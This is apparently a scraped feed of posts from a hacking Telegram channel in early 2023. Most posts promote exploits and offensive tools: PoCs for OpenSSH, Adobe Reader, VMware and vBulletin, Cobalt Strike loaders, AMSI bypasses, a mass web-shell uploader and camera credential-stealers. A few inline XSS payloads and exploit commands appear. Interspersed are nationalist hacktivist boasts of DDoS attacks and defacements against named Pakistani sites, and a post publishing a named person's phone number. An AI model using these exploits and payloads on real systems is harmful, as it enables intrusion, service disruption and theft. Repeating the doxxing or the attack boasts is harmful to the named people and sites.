🔥Multiple Internet to Baseband Remote Code Execution Vulnerabilities in Exynos Modems Until security updates are available, users who wish to protect themselves from the baseband remote code execution vulnerabilities in Samsung’s Exynos chipsets can turn off Wi-Fi calling and Voice-over-LTE (VoLTE) in their device settings.Turning off these settings will remove the exploitation risk of these vulnerabilities.Chipsets to devices, affected products likely include:💾Mobile devices from Samsung, including those in the S22, M33, M13, M12, A71, A53, A33, A21, A13, A12 and A04 series;💾Mobile devices from Vivo, including those in the S16, S15, S6, X70, X60 and X30 series;💾The Pixel 6 and Pixel 7 series of devices from Google;💾any wearables that use the Exynos W920 chipset; and💾any vehicles that use the Exynos Auto T5123 chipset. Images
2023-03-17 01:27:43
In India the best way to come in limelight or Increase Buisness is to abuse the sentiments against the nation itself, People will start talking about you or could be in your perimeter.Same happening in cybersecurity industry where online telegram users of so called company just see the posts of small kids attacking websites of India which dont have any severe vulnerability of Any APT level/type attack but portraits as huge attack or they are the best company. How ? With telegramic employees ?? Seriously !!! Employees Who see the posts of script kiddies on telegram and makes out the reasearch report. No it will be wrong if i also said research report actually that is paid media reports which is published to make the company big.Earlier also that company with zero knowledge of employees published the report about malaysian hackers who were just a script Kiddies.In fact, There are many State Sponsered APT level workers who continuously work for the nation in every country, You never know. The real attacks should be researched out not any attacks which is publically available.The old generation was disgusting in field of understanding the cybersecurity but these kind of people make this today's generation fool too.
2023-03-16 21:43:55
You can join our group for more such Cyber security
2023-03-16 21:42:20
2023-03-16 15:46:13
How Scammers Scam you To Show You How they hack Android using PDF They Use Old Adobe App (A RCE VULN. In IT) to Exploit Android full Blog:
2023-03-16 15:34:51
2023-03-16 13:16:17
2023-03-16 13:16:16
ETH 💸 MINER/FINDER SCAM exposedBy @Devil_Anon 💻☢️Watch the video▶️ to see the illustration on how it's done, and get the code from our forum post below.Spread awareness🎙📞 and let more people be aware of this trick which many people are being ripped off upon.Share🌐 and support⭐️@cyberhellcommunity
2023-03-16 08:37:29
2023-03-16 05:59:34
gg's hacker's ( have a good day —❤️ ‼️Here we go again Use AI to generate the perfect professional excuse 😂😂#hacker_bano_chutiya_nhe 👀👀
2023-03-15 12:13:48
2023-03-15 07:10:02
Vulnerabilities in the TPM 2.0 reference implementation codeBlog+TMP_vuln_POC =
2023-03-14 14:57:00
🔥Experimental navigation object contains a new DOM XSS source! navigation.currentEntry.urlnavigation.entries()[0].url Images
2023-03-13 14:29:47
Join our group for Exclusive Cyber security, pen testing, bug hunting and ethical hacking content.Inviting you all to come and join our
2023-03-13 02:39:39
2023-03-12 20:36:51 our group for more such Cyber security content
2023-03-12 11:21:45
Nmap:- Firewall evasion/Bypass, MTU and fragmentation.By @Devil_Anon 😈What is firewall evasion ❔This technique refers to generating or manually specifying the IP Addresses of the decoys to evade IDS / Firewalls. It appears to the target as well as the host are scanning the network. This technique makes it really difficult for the IDS / Firewalls to determine which IP Address is actually scanning the network and which IP addresses are a decoy.Show reactions 💯❤️ and enjoy the video.Share and promote@cyberhellcommunityComment section :- HERE
2023-03-12 08:34:17
Hello Pakistan 👋Aapne ghabrana nahi hai.
2023-03-11 18:36:54 our group for more such Cyber security content
2023-03-11 08:43:05
⚡⚡WATCH AND SPREAD!!🇮🇳🇮🇳🔺@AngrySaffron
2023-03-11 06:48:16
2023-03-11 06:16:55
Summary: In span of 2years NITB hosted 50-70+ internal portals for pakistan government. I think there is no need to write more.
2023-03-10 01:59:09
💥The Untold Story of the BlackLotus UEFI Bootkit🔖Semantic-based rule to cover malicious bootloader components from the BlackLotus bootkit(for FwHunt Community Scanner)
2023-03-08 07:56:28
2023-03-08 07:36:34
कुछ सपने है इस बेदर्द जिन्दगी में,जिन्हें पाने कि चाह में हम खोए हैं।जिस समय ये दुनियां वाले आराम से सोए रहते है,उस समय हम अपने काम में शिद्दत से खोए रहते है.... Written by:- @lexlegion "Specially for Hacker's"
2023-03-08 07:25:20
Wishing you a very colorful and joyous Holi! On the happy occasion of Holi, may your life always be filled with the colors of joy and happiness.#Jai_Radhe_Krishna#DDoS_Evil_Family
2023-03-07 10:19:09
💥You can use the experimental 'navigation' object to trigger JS execution in Chrome.<script>navigation.navigate('javascript:alert(1)')</script> Images
2023-03-06 15:04:51 Pakistan#OPPK
2023-03-06 02:09:58
🤔CVE-2023-21716 (Microsoft Word RCE vuln) Python PoC
2023-03-06 01:15:11
2023-03-05 10:59:47
Check Out These SitesRedefaced By Indian Hackers 😘Power Of Indian Hackers &Feel The Power Of Indians🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮
2023-03-05 10:59:37
Hacked By EagleCyber #TeamArmyBawangMalaysia #StucxnetCrewMalaysia #Khalifahcybercrew #EagleCyber #GhostClanOffical #KingsmenWorld #GhostArmy16 #AnonManK #DarkHCyberXArmy #DarkCyberXPravasiArmy #DarkHCyberXArmy #NinjaCrewCyberGhost #UndergroundGhostCrew #pejuangcyber #LcmySecTeam #K𝐚𝐦𝐩𝐮𝐧𝐠G𝐡𝐨𝐬𝐭𝐀𝐜𝐚𝐝𝐞𝐦𝐲𝐃𝐃𝐨𝐬𝐂𝐫3𝐰 #KampungGhostDDosCyberArmy's#KomunitiSiberMalaysia
2023-03-05 04:15:37
2023-03-05 02:39:05
💥Nuclei-templates that help during the bug bounty hunting process.
2023-03-05 02:28:27
Cortex XDR Config Extractor is a tool is meant to be used during Red Team Assessments and to audit the XDR Settings. With this tool its possible to parse the Database Lock Files of the Cortex XDR Agent by Palo Alto Networks and extract Agent Settings, the Hash and Salt of the Uninstall Password, as well as possible Exclusions.Supported Extractions:Uninstall Password Hash & SaltExcluded Signer NamesDLL Security Exclusions & SettingsPE Security Exclusions & SettingsOffice Files Security Exclusions & SettingsCredential Gathering Module ExclusionsWebshell Protection Module ExclusionsChildprocess Executionchain ExclusionsBehavorial Threat Module ExclusionsLocal Malware Scan Module ExclusionsMemory Protection Module StatusGlobal Hash ExclusionsRansomware Protection Module Modus & SettingsDownload:-
2023-03-04 10:59:02
The Land of missing peopleThat is what Balochistan is called by nowadays Following the request of these people, we announce #OpBalochistanTo the pakistan army and ISI, You lot really wouldn't last a minute with our penetration. But we do wish you enjoy XoXo ~GhostSec
2023-03-03 15:52:37
WEBSITE HACKING Tutorial✅🌐 (WORDPRESS){Web Analysis, info Enumeration, CVE Analysis and Admin Panel Bruteforce.}By @Devil_Anon Tool :- wpscan O.S :- kali What is website hacking ❔website hacking is simply the unauthorized and attack infiltration unto the vulnerability of a website in order to get access to the admin panel.Give reactions❤️ and enjoy the video✅Comment Section HERE
2023-03-03 14:53:28
⚙️ CamOver is a camera exploitation tool that allows to disclosure network camera admin password.Features:💾Exploits vulnerabilities in most popular camera models such as CCTV, GoAhead and Netwave.💾Optimized to exploit multiple cameras at one time from list with threading enabled.💾Simple CLI and API usage.⚙️ CamRaptor is a tool that exploits several vulnerabilities in popular DVR cameras to obtain network camera credentials.Features:💾Exploits vulnerabilities in most popular camera models such as Novo, CeNova and QSee.💾Optimized to exploit multiple cameras at one time from list with threading enabled.💾Simple CLI and API usage. Images
2023-03-03 11:40:57 Shopping Site Down By DdoS_Evil 😈😘
2023-03-03 07:35:01
2023-03-02 14:46:36
2023-03-02 01:10:45 This Site Is Permanently Gone 😂😙 sites went offline.. expect more attacks from PH and IND #fakpakpakpak #fckistan
2023-03-01 11:34:16
2023-03-01 07:42:46
Best Web Crawling :
2023-03-01 05:02:17 😈DDoS Done😈After Bypassing CloudFlare 🖕 Share And Support😈😈Evils Always Remains Evil😈
2023-03-01 01:31:01
📲ssl-kill-switch3 is a next-generation of iOS Tweak SSLKillSwitch(2) with much more functionality! Images
2023-02-28 08:23:05
2023-02-28 00:25:03
Пакистан, видно что мы там делаем?🥹PHOENIX❤ Images
2023-02-27 13:45:53
🔥APT38 Tactic PoC for Stealing 0-days 💾program based on APT38 North Korea-backed hackers tactic that used in targeting security researchers using a malicious Visual Studio project file (vcxproj) to steal their 0days.💾Once the program runs, it will infect all of your Visual Studio projectsDownload:-
2023-02-27 00:50:10
Шла вроде вторая неделя, я уже сбился со счета. Пакистану все так же похуй.
2023-02-26 04:44:29
Hello Guys,I am making an Private Page on regarding OSINTSo if anyone wants to contribute or help me to make this project successful will be highly appreciated if you are interested please contact me at if you want to be in my team please let me know.
2023-02-26 04:41:22 own repo for OSINT
2023-02-25 15:35:06
2023-02-25 08:02:34
😈When an evil hurts...😈DDoS Done of Targetted Country😈😈😈😈😈😈😈😈😈😈List of Pakistani Websites:-😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈https://laam.pk😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈https://www.pktrucks.com😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈For Support, Do Share As Much As Possible 😈
2023-02-25 07:59:49
2023-02-25 02:16:53
🔥Arm Mali: insufficient cache invalidation for non-page-aligned user buffer importsWhen a user buffer is imported into Mali and mapped into the GPU, Mali calls dma_map_page(). This implicitly does a dcache_clean_poc() on the mapped range (unless the kernel knows that the device is DMA-coherent) to ensure that dirty cache state is written back to main memory before the user buffer can be accessed by the GPU and possibly also uncached mappings on the CPU.However, when a user buffer is imported that does not begin/end at page boundaries, Mali still installs PTEs on the CPU and GPU that map the entire page, but only calls dma_map_page() on the user-specified range. This means that the rest of the page is mapped without any cache maintenance.Therefore, when the GPU is not cache-coherent (which Jahn think means there's no ACE or ACE-Lite) or when Mali creates uncached CPU-side mappings, malicious code can read stale memory contents. This is a problem if the last cache writeback happened before the kernel's page allocator zeroed the page and handed it to userspace, since that means the stale data we're reading is whatever the previous user of the page wrote into it.
2023-02-25 01:54:25
2023-02-24 20:43:22
A new blog on OSINT Bug Hunting seriesLearn dorks and filters of Shodan, LinkedIn, Dnsdumpster, GitHub dorks, Wayback machine, Google dorks and much more...Here is the link to the blog't seen the first part? Here is the link't seen the second part?Here is the link our group for such exclusive
2023-02-24 16:33:45
⚠️⚠️⚠️⚠️⚠️⚠️⚠️Hello homies. Wait for uploading soon music share and support Wait wait every day 1 music upload soon and download linkI have 900 music you don't know how is good
2023-02-24 16:10:33
💥Fancy new way to conceal XSS payloads(Assignable protocol with location)<script>location.protocol='javascript'</script>
2023-02-24 12:17:17
OpenSSH 9.1 exploit and Mass ScanVulnerability CVE-2023-25136 affects the SSH pre-authentication process. Using it, an attacker can corrupt memory and execute arbitrary code on a machine without being authenticated on the target server.Download:
2023-02-24 12:11:06
💥Patchless/breakpoint in process amsi bypass thingy with C#Download CS File:-
2023-02-24 12:00:30
❤️ is a fantastic website that offers a unique and exciting service similar to ChatGPT But Difreent is that its not ChatGPT All Your Answer Come Across To Our Bhagwat Geeta 🕉.Link :🤞Whether you want to know about science, technology, history, philosophy, or anything in between, has got you covered. It is designed to provide you with accurate and insightful answers to your queries, just like a human expert would.🛕Click Here To Visit
2023-02-24 02:23:09
CVE-2023-0754PTC Thingworx Edge C-SDK twHeader_fromStream Integer Overflow RCE VulnerabilityCVE-2023-0755PTC Thingworx Edge C-SDK mulitpartMessageStoreEntry_Create Array Indexing OOB Write RCE VulnerabilityDownload POC exploit:
2023-02-23 21:12:57
Hi Everyone!A new Blog on Burp Suite.Let's learn how to use it like a Cyber Security ProfessionalA beginners blog to take your first step towards Burp Suite Here is the link 🔗 our group for such exclusive
2023-02-23 15:26:01
2023-02-23 11:14:30
💥PS script to exploit ESC1/retrieve your own NTLM password hash using only built-in Windows binaries to generate the PFX.Download:
2023-02-22 12:18:46
2023-02-22 09:42:05
2023-02-22 09:42:04
2023-02-22 01:31:54
BREAKING: Russian hacker group Phoenix announces hacking major ministries of Pakistan Govt.The group called the hack "hacking the whole Pakistan."ब्रेकिंग: रूसी हैकर समूह फीनिक्स ने पाकिस्तान सरकार के प्रमुख मंत्रालयों को हैक करने की घोषणा की।समूह ने हैक को "पूरे पाकिस्तान को हैक करना" कहा।🔺Just In: @AngrySaffron
2023-02-21 19:43:32
A blog on NmapLet's learn how to use Nmap.Nmap commandsNmap cheat sheetNmap techniquesHere is a link to the blog our group for more exclusive cyber security
2023-02-21 13:50:14
🔥🔥🔥Fortinet FortiNAC CVE-2022-39952 Deep-Dive, PoC and IOCsAn external control of file name or path vulnerability [CWE-73] in FortiNAC webserver may allow an unauthenticated attacker to perform arbitrary write on the system.🔖PoC exploit here
2023-02-21 12:01:29
🔥🔥🔥REUnziP: Re-Exploiting Huawei Recovery With FaultyUSB(CVE-2022-44563, Toc-ToU race condition vuln can be exploited to achieve arbitrary code execution )This is a new vulnerability in a proprietary mode called “SD-Update”, which can once again be used to achieve arbitrary code execution in the recovery mode, enabling unauthentic firmware updates, firmware downgrades to a known vulnerable version or other system modifications. Taszk advisory for the vulnerability is published here. The story of exploiting this vulnerability was made interesting by the fact that, since the exploit abuses wrong assumptions about the behavior of an external SD card, we needed some hardware-fu to actually be able to trigger it. In this blog post, Lorant Szabo describe how we went about creating “FaultyUSB” - a custom Raspberry Pi based setup that emulates a maliciously behaving USB flash drive - and exploiting this vulnerability to achieve arbitrary code execution as root!
2023-02-21 11:31:00
2023-02-21 04:59:04 Pakistan Bhen chod Team Insane PK Check Out These Sites🤣🤣🤣🤣😂😂🤣😂🤣😂
2023-02-20 07:54:59
​​CeWLCustom Word List generatorBased on a discussion on PaulDotCom (episode 129) about creating custom word lists spidering a targets website and collecting unique words I decided to write CeWL, the Custom Word List generator. CeWL is a ruby app which spiders a given URL to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper.By default, CeWL sticks to just the site you have specified and will go to a depth of 2 links, this behaviour can be changed by passing arguments. Be careful if setting a large depth and allowing it to go offsite, you could end up drifting on to a lot of other domains. All words of three characters and over are output to stdout. This length can be increased and the words can be written to a file rather than screen so the app can be automated.
2023-02-20 07:54:58
​​CommixAutomated All-in-One OS Command Injection Exploitation Tool. #redteam
2023-02-20 07:49:00
For basic researches, top 25 vulnerability parameters that can be used in automation tools or manual recon
2023-02-19 22:00:15
Wait is over!Here is the second part of the bug hunting seriesBug hunting with OSINTHere is the link't seen the first part? Don't worry here is the link for that:Link for part 1: our group for such amazing and exclusive contentDon't miss here is the link to join our
2023-02-19 02:54:09
Anonymous Spoof 😂😂 Porkies (pakistan/Bhikaristan)Now Anonymous Be Like:Humko barbad kardo B*******
2023-02-19 01:52:38
2023-02-18 13:04:19
Kindly, Be assured that we will contribute in Pakistan's cyber defence & will keep access of everywhere in pakistan wherever they shift.
2023-02-18 06:51:41
2023-02-18 00:49:09
महाशिवरात्रि कि हार्दिक शुभकामनाएं 🚩
2023-02-17 23:30:52
You can also join our group for such exclusive
2023-02-17 23:30:01
Here is a video on Packet sniffingIf you like then Kindly subscribe and watch the video till end. It will be a great support from your side.Let's see A video on Packet sniffing our group for Exclusive content
2023-02-17 09:09:26
2023-02-17 05:41:49 Defecement with Phantom
2023-02-17 04:58:06
CVE-2023-23752Joomla webservice endpoint accessPoChttpx -l ip.txt -path '/api/index.php/v1/config/application?public=true'
2023-02-16 22:22:34
Hello everyoneA blog on packet sniffing using Wireshark for beginners who want to know how further use Wireshark.Let's see blog + videoLet's learn and growHere is a link to the blog our group for more cyber security content. We are helping beginners to start there career in Cyber securityHere is the link to our Security
2023-02-16 13:50:35
2023-02-16 11:19:03
Cloud7 Bot 150$ For Free #GET SMTP/VPS/DATABASE From Config/Environment#WordPress Upload Shell (139 Exploit + Bypassing Shell)#WebMin 1,9xx Remote Code Execution#PresTaShop Upload Shell (57 Exploit +Bypassing Shell)#KcFinder,PHPUNIT,vBulletin,jQuery,osCommerce,Other Filemanager Mass upload shell#All CMS BRUTE FORCE 1000 WORDLISTS#Priv Bing Dorker 500 Page#Get IP From List Website #Joomla Upload Shell (102 Exploit + Bypassing Shell) <- Looping ExploitDownload:-
2023-02-16 10:17:25
2023-02-15 18:39:30
Hi Everyone!We all know lot of network based attacks are happening with the help of WiresharkBut do we really know how to use the Wireshark.Let's learn in detail like a professional.Use Wireshark like a Cyber Security Professional.Here is the link to the blog can learn lot of cyber security stuff on my website techofide.comAlso join this group for more Cyber Security Professional
2023-02-15 14:09:02
​​EdgeGPTReverse engineered API of Microsoft's Bing Chat
2023-02-15 08:42:14
2023-02-15 00:13:59
✌️😎 I love trolling such madafaka tharki
2023-02-14 21:20:20
A new video on OSINT bug hunting.I recommend you to watch it and learn latest techniques of data gathering and reconnaissance
2023-02-14 15:19:23 #PakistanTerrorist #FckPak
2023-02-14 12:02:40
Yesterday I found a shell(backdoor) of a der-rupiya hackers probably sponsered by chavanni Intelligence agency in one of the Indian Govt website. The total number of govt website hosted on that server was 70+ there, so it means any or all 70 websites could have been defaced against Indian govt any time, or could have been used in other mean.It was part of my official work so can't disclose more about website or servers in this channel and you must be aware that these things doesn't come out.Although, Vulnerabilities is patched.The shell implant date was of 26th January 2023, the same timeline when nagpur shell implant/leak occurred.It's good that one foothold was removed but one man can't do everything, all the geeks should contribute and report at least pass the Intel's to make Indian cyberspace safe.Don't think what the country will give you, think what you will give to the country.Winding up, You know what fun is still remaining about those (Script-kiddies) ? They dropped shell and trace of Indonasian hackers. Waah Tatte Pakistan Waaah. 😂 Sale apn yahan chaal se pehchaan lete hai kon belly dancer hai or kon bar dancer... 😉 😆😆
2023-02-14 09:17:54
2023-02-14 07:25:29
2023-02-13 21:30:54
Hello everyone! Here is our new article on Aircrack-ngThis will show you everything that you need to learn before start with a practical demonstrationBlog + Video
2023-02-13 16:05:45
📕Knockout Win Against TCC - 20+ NEW Ways to Bypass Your MacOS Privacy Mechanisms
2023-02-13 09:44:59
2023-02-12 15:22:45
​​DDoS-Protection-LiteAnti-DDoS-Lite (Anti-Crawler app) is a small PHP app to protect your site against DDoS attack.
2023-02-12 14:08:40
🔓CVE-2022-23935 exploit PoC exiftool version 12.37Usage:./CVE-2022-23935 <IP> <PORT>Download:
2023-02-12 12:32:47
​​ConfFuzzFuzzing for Interface VulnerabilitiesConfFuzz is an in-memory fuzzer aimed at detecting interface vulnerabilities in compartmentalized contexts. ConfFuzz is a cooperation between the University of Manchester, University Politehnica of Bucharest, Rice University, and It has been accepted to appear in NDSS'23.
2023-02-12 12:28:54
ExploitLeakedHandle: Identify and exploit leaked handles for local privilege escalation
2023-02-11 14:52:07
Hey everyone!Check out our another blog on SQL Injection.SQL Injection attack | Prevention| Cyber Security ProfessionalsLet's learn and grow together
2023-02-11 13:45:24
BokuLoader | is a Cobalt Strike User-Defined Reflective Loader written in Assembly & C for advanced evasion capabilities.Now supports: sleepmask, cleanup, and obfuscate evasion features!Download:
2023-02-11 11:44:48
2023-02-11 11:44:47
2023-02-11 11:04:14
Resources for Reverse Engineering Online Games#cybersecurity #infosec #hacking
2023-02-11 03:25:30
🔥🔥🔥glibc-2.37 - incorrect printf output for integers with thousands separator and width field(CVE-2023-25139, BOF)sprintf in the GNU C Library (glibc) 2.37 has a BOF (OOB) in some situations with a correct buffer size. This is unrelated to CWE-676. It may write beyond the bounds of the destination buffer when attempting to write a padded, thousands-separated string representation of a number, if the buffer is allocated the exact size required to represent that number as a string. For example, 1,234,567 (with padding to 13) overflows by two bytes.Consider the following C program:#include <stdio.h>#include <locale.h>int main (void){ if (setlocale (LC_ALL, "")) { printf ("1234567890123:\n"); printf ("%0+ -'13ld:\n", 1234567L); } return 0;}and try it with a locale that has a thousands separator, such as "LC_ALL=en_US.utf8".With glibc up to 2.36, Vincent get as expected:1234567890123:+1,234,567 :Confirmed that this could potentially cause a buffer overflow with sprintf, something like below. This will occur in the corner case where an application computes the size of buffer to be exactly enough to fit the digits in question, but sprintf ends up writing a couple of extra bytes, hence going beyond bounds.#include <stdio.h>#include <locale.h>#include <string.h>int main (void){ char buf[strlen ("1234567890123:") + 1]; __builtin_memset (buf, 'x', sizeof (buf)); if (setlocale (LC_ALL, "")) { printf ("1234567890123:\n"); printf ("%0+ -'13ld:\n", 1234567L); sprintf (buf, "%0+ -'13ld:", 1234567L); for (size_t i = 0; i < strlen ("1234567890123:") + 1; i++) { printf ("%c", buf[i]); } printf ("\n"); } return 0;}To finish, building with _FORTIFY_SOURCE should catch this problem immediately:💾$ gcc -D_FORTIFY_SOURCE=1 -O -o sprintf-test sprintf-test.cAnd run:💾$ LOCPATH=$PWD/localedata LC_ALL=en_US.UTF-8 ./elf/ --library-path .:./math:./elf:./dlfcn:./nss:./nis:./rt:./resolv:./mathvec:./support:./crypt:./nptl ../sprintf-test1234567890123:+1,234,567 :*** buffer overflow detected ***: terminatedAborted (core dumped)🛡Fixed here( github mirror, backport to release/2.37/master ): "Account for grouping in printf width".
2023-02-11 03:02:35
2023-02-10 12:35:29
2023-02-10 12:35:28
2023-02-10 11:54:38
Huge !! ❤️ 🇮🇳Probably In response of recent MEA mail Server attack APT Group Sidewinders Hackers Have Compromised 7.5 TB of Email and Official Data Of Ministry Of Foreign Affairs Pakistan.Indian Email Data of Almost 25GB was on darkweb. Investigation of Indian mail server breach is already in process.
2023-02-10 11:26:26
2023-02-10 09:46:53
0Day Avalanche Blockchain API Dos POC Video
2023-02-10 09:36:35
OWASP WrongSecrets | Vulnerable app with examples showing how to not use secrets
2023-02-10 07:00:41
2023-02-10 06:54:10
Ministry of Foreign Affairs Pakistan7.5 TB of Internal & Email Data is compromised. Few Samples Attached@sidewinders
2023-02-10 05:38:17
2023-02-10 05:35:20
Pakistani Diplomat Sexual Harassment with Amna Umer Barcelona.
2023-02-10 01:17:39
FATF PAKISTAN MEETING WAS BREACHED.Just Before being out of Grey List.
2023-02-09 15:24:07
This time not only blog but let's learn with a detailed step by step videoIf you like our content then please support us by subscribing and watching full video.Let's grow and spread Cyber Security
2023-02-09 15:17:03
A new Blog on Metasploit.Learn Metasploit in professional way like Cyber security professionals.Here is the link to the detailed blog.
2023-02-09 14:36:31
Today I ffound A so cold FB,Insta And Google HackerTelegram Name:- SavataHer no. +91 63628 93283Real_Name : rajni kaneriLocation: karnataka
2023-02-09 11:00:52
🧰OperatorsKit is a collection of tools that integrate with Cobalt Strike through BOFs.Link:-
2023-02-09 10:06:25
IoT-PTA Virtual environment for Pentesting IoT Devices
2023-02-09 09:50:22
You don't need to buy a GPU for machine learning work!There are other alternatives. Here are some:1. Google Colab2. Kaggle3. Deepnote4. AWS SageMaker5. GCP Notebooks6. Azure Notebooks7. Cocalc8. Binder9. Saturncloud10. Datablore11. IBM Notebooks Spend your time focusing on your problem.💪💪 Let others worry about the hardware!!
2023-02-09 07:21:53
ssc-asi-tools - SecurityScorecard Attack Surface Intelligence tools repository with a python suite of tools.Link:-
2023-02-08 17:54:03
2023-02-08 17:54:02
2023-02-08 17:22:44
Blue Team / Incident Respornse 👨‍💻This github repository contains a collection of 35+ tools and resources that can be useful for blue teaming activities. #BlueTeam #Infosec
2023-02-08 16:58:20
2023-02-08 09:21:48
Recovery script for ESXiArgs ransomwareRecovery Script:-
2023-02-07 10:10:28
2023-02-07 09:32:45
Mobile Application Penetration Testing Cheat Sheet 📒#Infosec #Android #Ios #Tech #Cyber #BugBounty #Security
2023-02-07 09:31:21
Mini description of linux file permissions. Found this helpful!#Linux #infosec #cybersecurity
2023-02-07 05:27:04
exploit for an actively exploited zero-day vulnerability affecting the GoAnywhere MFT administration consoles.Exploit:
2023-02-07 01:19:18
2023-02-07 01:19:17
2023-02-06 14:06:32
Apache SCXML RCE (PoC included) + ArticleLink:-
2023-02-06 13:35:29
A new post for those who want to learn Metasploit and Meterpreter.Hi Cyber learnersCheck my new post + Video on Metasploit and Meterpreter.How to Use Metasploit | Meterpreter | Reverse shell | Metasploit Tutorial
2023-02-06 11:13:59
All Common Ports Enumerations and Exploitations
2023-02-06 10:24:47
2023-02-06 08:22:22
A public collection of POCs & Exploits for the vulnerabilities I discovered
2023-02-05 18:03:51
2023-02-05 18:03:50
2023-02-05 13:00:40
Hi, all a new blog on Smurf attack is now hereLearn the technique to perform this Ddos attack.Here is the link to the blog
2023-02-05 06:07:31
2023-02-04 16:10:35
Microsoft Exchange: OWASSRF + TabShell (CVE-*2022-41076)*The TabShell vulnerability its a form of Privilege Escalation which allows breaking out of the restricted Powershell Sandbox after you have successfully gained access through OWASSRF.For a detailed write see research:*PoC: * #ssrf #tabshell #poc@virus303@NetEditors
2023-02-04 15:27:28
📡Space Jam: Exploring Radio Frequency Attacks in Outer SpaceDownload:-
2023-02-04 14:53:20
CVE-2021-21974 | Ransomware targeting VMware ESXiThese attacks are detected globally and especially in Europe. According to experts from the ecosystem as well as autorities, they might be related to Nevada ransomware and are using CVE-2021-21974 (OpenSLP as used in ESXi has a heap-overflow vulnerability) as compromission vector. Investigation are still ongoing to confirm those assumptions.Exploit:-
2023-02-04 12:29:43
Want to learn about OSINT (Open Source Threat Intelligence and Threat Intelligence Tools?Check our new blog on:What is OSINT? | OSINT Framework | Tools for OSINT | Best OSINT TechniquesHere is the link to his blog.
2023-02-04 12:05:07
CVE-2023-25135vBulletin - RCE + exploitLink:-
2023-02-04 10:10:09
CVE-2022-22583 CVE-2022-22616 CVE-2022-22639 CVE-2022-26690 CVE-2022-26712 CVE-2022-26728 CVE-2022-32786 CVE-2022-32800
2023-02-04 08:35:58
🪂 Standout as Web design Expert Course 🪂Download link-🔐 Zip Password- @udemyking1✦•━━━━━━━━━━━━━━━━━•✦👉 𝑀𝑢𝑠𝑡 𝐿𝑖𝑘𝑒 & 𝐹𝑜𝑙𝑙𝑜𝑤 𝑂𝑢𝑟 𝑃𝑎𝑔𝑒𝑠👇🔷 𝒀𝒐𝒖𝑻𝒖𝒃𝒆 ➛🔶 𝑭𝒂𝒄𝒆𝒃𝒐𝒐𝒌 ➛🔷 𝑳𝒊𝒏𝒌𝒆𝒅𝑰𝒏 ➛🔶 𝑰𝒏𝒔𝒕𝒂𝒈𝒓𝒂𝒎 ➛🔷 𝑱𝒐𝒊𝒏 𝑭𝒂𝒔𝒕 ➛✦•━━━━━━━━━━━━━━━━━•✦
2023-02-03 22:28:22
2023-02-03 22:28:21
2023-02-03 14:54:19
2023-02-03 11:42:03
2023-02-03 08:37:11
💥Cobalt Strike BOF that bypasses AMSI in a remote process with code injection.Download:-
2023-02-03 08:36:23
Needle (CVE-2023-0179) exploitDownload:-
2023-02-03 08:33:23
💥If a web application allow you to upload a .zip file, zip:// is an interesting PHP wrapper to turn a LFI into a RCE.
2023-02-02 23:00:59
🔥🔥🔥Adobe Acrobat Reader - resetForm - CAgg UaF - RCE Exploit(CVE-2023-21608)Download:
2023-02-02 22:49:09
🔥Chrome heap buffer overflow in validating command decoder(CVE-2022-4135) Heap BoF/OOB access in GPU in Google Chrome prior to 107.0.5304.121 allowed a remote attacker who had compromised the renderer process to potentially perform a SBX via a crafted HTML page.🛡Patch CLExploit strategy:The vulnerability immediately provides an attacker with an extremely powerful exploitation primitive -- a non-linear BoF with a controlled offset.Exploit flow:The exploit abuses the command buffer and GLES2 APIs for memory manipulation. A corrupted memory bucket is used to first leak data from the GPU process and break ASLR, and then, when the ROP chain is ready, hijack the control flow.reproduce:<script> canvas = document.createElement("canvas"); document.documentElement.appendChild(canvas); context = canvas.getContext("webgl2"); context.blendColor(0, 0, 0, 0);</script>⚠️Part of an exploit chain: CVE-2022-4135 + CVE-2022-3723
2023-02-02 22:42:46
🔥Brave browser 1 day exploit.This is a remote crash that triggers in brave browser due to how the rss XML parsing happens by reading an item's title that contains the < (less than) character.Download:
2023-02-02 18:45:54
2023-02-02 11:45:06
2023-02-02 10:01:44
Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6download:
2023-02-02 09:48:32
#RedTeam #hack #toolsCollection of 100+ tools and resources that can be useful for red teaming activities.
2023-02-02 09:23:49
📲Enzyme is an jailbreak-free iOS modding framework that allows you to statically patch and hook iOS apps. This repository contains an example using Enzyme. For modifying this, check out the CMakeLists.txt file, the patcher/ file, the patcher/bootstrap.asm file, and the src folder.Download:-
2023-02-02 05:04:52 my Motivational And Infosec Blogs.
2023-02-02 04:57:51 @hacklathon
2023-02-02 04:56:05
2023-02-01 12:33:08
Master OAuth 2.0 Vulnerability #bugbounty #infosec  Difficulty : Any OAuth 2.0 Resources :👇• • • • • • • • • • • • • • • • • • • • • • • • You For Reading this 🙏Hope You'll like 👍 it
2023-02-01 10:33:30
2023-02-01 09:50:05
2023-02-01 09:40:48
2023-01-31 13:12:37
🔥🔥🔥VMware vRealize Log Insight VMSA-2023-0001 Technical Deep DiveThis vulnerability is exploitable in the default configuration for VMware vRealize Log Insight. We have successfully reproduced this exploit and would like to provide the technical details about how this vulnerability works. 💥PoC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs:💾 VMware vRealize Log Insight Directory Traversal Vulnerability(CVE-2022-31706)💾 VMware vRealize Log Insight broken access control Vulnerability(CVE-2022-31704)💾 VMware vRealize Log Insight contains an Information Disclosure Vulnerability(CVE-2022-31711)Download:
2023-01-31 11:43:12
PoC of CVE-2021-34514(Windows Kernel EoP vuln, ALPC OOB)Download:
2023-01-31 09:55:09
CVE-2022-26485 exploit(UAF in XSLT parameter processing, bugzilla )Removing an XSLT parameter during processing could have lead to an exploitable use-after-free. Mozilla have had reports of attacks in the wild abusing this flaw. This vulnerability affects Firefox < 97.0.2, Firefox ESR < 91.6.1, Firefox for Android < 97.3.0, Thunderbird < 91.6.2, and Focus < 97.3.0. ⚠️Tested against Firefox 78.0 (Windows)Download:
2023-01-31 07:17:44
The shortest payload for a tiny php reverse shell written in 19 bytes using only non-alphanumeric characters. Hex values inside ⛶ indicate raw bytes.This will help to bypass WAF and execute PHP reverse shell for RCE.Download:
